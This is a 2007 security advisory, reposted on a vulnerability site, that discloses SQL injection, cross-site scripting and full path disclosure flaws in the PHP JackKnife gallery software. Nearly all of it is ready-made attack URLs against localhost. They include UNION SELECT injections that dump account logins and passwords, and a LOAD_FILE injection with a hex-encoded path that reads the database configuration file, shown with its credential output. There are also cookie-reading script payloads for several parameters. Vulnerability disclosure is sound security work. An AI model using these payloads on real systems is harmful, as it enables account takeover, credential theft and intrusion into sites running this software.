Computer Security

Security Advisory: PHP JackKnife [multiple vulnerabilities]
back  news / advisories / forum / software / advertising / search / exploits  forward
[EN] securityvulns.ru
no-pyccku



Related information

  Daily web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)

  Full Path Disclosure in SendCard

  Prototype of an PHP application ===> RFI

  static XSS / SQL-Injection in Omegasoft Insel

  PBSite - PHP Bulletin Site | CMS ====> RFI

From:laurent gaffie <laurent.gaffie_(at)_gmail.com>
Date:01.06.2007
Subject:PHP JackKnife [multiple vulnerabilities]

Vendor site: http://www.phpjk.com/
Product: phpjackknife
Bug: sql injection , xss , full path
Risk: high
Note: works regarless of php.ini settings

Description:
PHP JackKnife (PHPJK) is freely downloadable PHP gallery software that you can use to instantly create you own online web gallery



Injection sql GET  :

http://127.0.0.1/PHPJK/G_Display.php?iCategoryUnq=-1/**/union/**/select/**/1,2,
Password,4,5,6/**/from/**/Accounts/*
http://127.0.0.1/PHPJK/Search/DisplayResults.php?DOMAIN_Link=&iSearchID=-1+UN
ION+SELECT+1,1,1,1,Login,1,Password,1,1,1,1,1,1,1+FROM+Accounts/*

Read database credentials:
http://127.0.0.1/PHPJK/G_Display.php?iCategoryUnq=-1/**/union/**/select/**/1,2,
LOAD_FILE(0x2F7573722F6C6F63616C2F617061636865322F6874646F63732F5048504A4B2F4
36F6E66696775726174696F6E732F5048504A4B5F436F6E6669672E706870),4,5,
6/**/from/**/Accounts/*

//Result (in the page source code) :
$sUseDB = "MYSQL";
$sDatabaseName = "phpjk";
$sDatabaseServer = "localhost";
$sDatabaseLogin = "my_user";
$sDatabasePassword = "my_password";

ps:( 0x2F75......... = /usr/local/apache2/htdocs/PHPJK/Configurations/PHPJK_Config.php )


Xss get :

http://127.0.0.1/PHPJK/G_Display.php?iCategoryUnq=</textarea>'">
<script>alert(document.cookie)</script>
http://127.0.0.1/PHPJK/G_Display.php?iDBLoc=</textarea>'"><s
cript>alert(document.cookie)</script>
http://127.0.0.1/PHPJK/G_Display.php?iTtlNumItems=</textarea>'">
<script>alert(document.cookie)</script>
http://127.0.0.1/PHPJK/G_Display.php?&iNumPerPage=</textarea>'"
><script>alert(document.cookie)</script>
http://127.0.0.1/PHPJK/G_Display.php?sSort=</textarea>'"><sc
ript>alert(document.cookie)</script>
http://127.0.0.1/PHPJK/UserArea/Authenticate.php?sUName=</textarea>'"
><script>alert(document.cookie)</script>
http://127.0.0.1/PHPJK/UserArea/NewAccounts/index.php?sAccountUnq=</textarea>
'"><script>alert(document.cookie)</script>

Full path :

http://127.0.0.1/PHPJK/G_Display.php?iCategoryUnq[]=1
http://127.0.0.1/PHPJK/G_Display.php?sSort[]=Name_A
http://127.0.0.1/PHPJK/index.php?iParentUnq[]=0


regards laurent gaffie
contact: laurent.gaffie@gmail.com
About | Terms of use | Privacy Policy
© SecurityVulns, 3APA3A, Vladimir Dubrovin
Nizhny Novgorod

 
 


Rating@Mail.ru